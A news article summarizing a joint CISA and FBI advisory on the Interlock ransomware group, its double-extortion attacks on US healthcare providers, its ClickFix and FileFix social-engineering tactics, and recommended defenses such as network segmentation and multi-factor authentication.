#StopRansomware: CISA & FBI Warn of Interlock Ransomware Surging, Hits US Healthcare Giants
A surge of cyberattacks has been recorded across the United States, attributed to the Interlock group, which employs a double extortion strategy targeting companies and critical infrastructure entities. This warning was jointly issued by the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI, in collaboration with the Department of Health and Human Services (HHS) and the Multi-State Information Sharing and Analysis Center (MS-ISAC).
The advisory provides up-to-date indicators of compromise (IOCs) identified during recent incident investigations, including those reported in June 2025. In addition to technical evidence of intrusion, the report outlines the current tactics employed by threat actors and offers specific recommendations for mitigating their impact.
Interlock is a relatively new threat actor, with its first observed attacks dating back to September 2024. Since then, the group has expanded its operations beyond national borders, targeting organizations across various sectors worldwide. The healthcare industry has been disproportionately affected—likely due to its reliance on uninterrupted access to digital infrastructure.
Interlock has previously been linked to ClickFix campaigns, where attackers disguised themselves as legitimate IT tools to gain initial access to corporate environments. They have also been associated with the deployment of the NodeSnake malware, which infiltrated IT networks at British universities.
Among the group’s most recent targets are major U.S. healthcare providers. Notably, DaVita—a Fortune 500 company specializing in kidney treatment—suffered a breach in which attackers claimed to have exfiltrated and published 1.5 terabytes of data. Kettering Health, a large healthcare network comprising over 120 outpatient facilities and more than 15,000 staff members, was also compromised.
The FBI highlighted Interlock’s use of unconventional techniques. In several cases, malicious payloads were delivered via “drive-by” attacks—infected yet ostensibly legitimate websites—an uncommon vector among ransomware operators.
Interlock’s primary modus operandi centers on dual extortion: first, sensitive data is stolen from compromised systems; then, the remaining files are encrypted. This approach exerts compounded pressure on victims, demanding payment both for data decryption and for preventing public disclosure of stolen information.
In July, experts identified a novel tactic dubbed FileFix, which relies on social engineering and leverages trusted Windows interfaces such as File Explorer and HTML Applications (HTA). These elements are used to trick victims into executing malicious PowerShell or JavaScript code, bypassing conventional security warnings. This grants attackers remote access to target systems and facilitates further malware deployment.
To reduce the likelihood of infection and extortion, organizations are advised to implement DNS request filtering and enforce web access through secure firewalls. Equally critical is educating personnel—staff should be trained to recognize social engineering ploys and phishing attempts.
Technical safeguards must include the continuous patching and updating of all IT infrastructure components, from operating systems to firmware. Segmenting corporate networks into isolated zones can help contain an attack, should one segment be breached.
Additional resilience can be achieved through robust identity, credential, and access management (ICAM) policies—most notably, by mandating multi-factor authentication for all internal and external services wherever feasible.
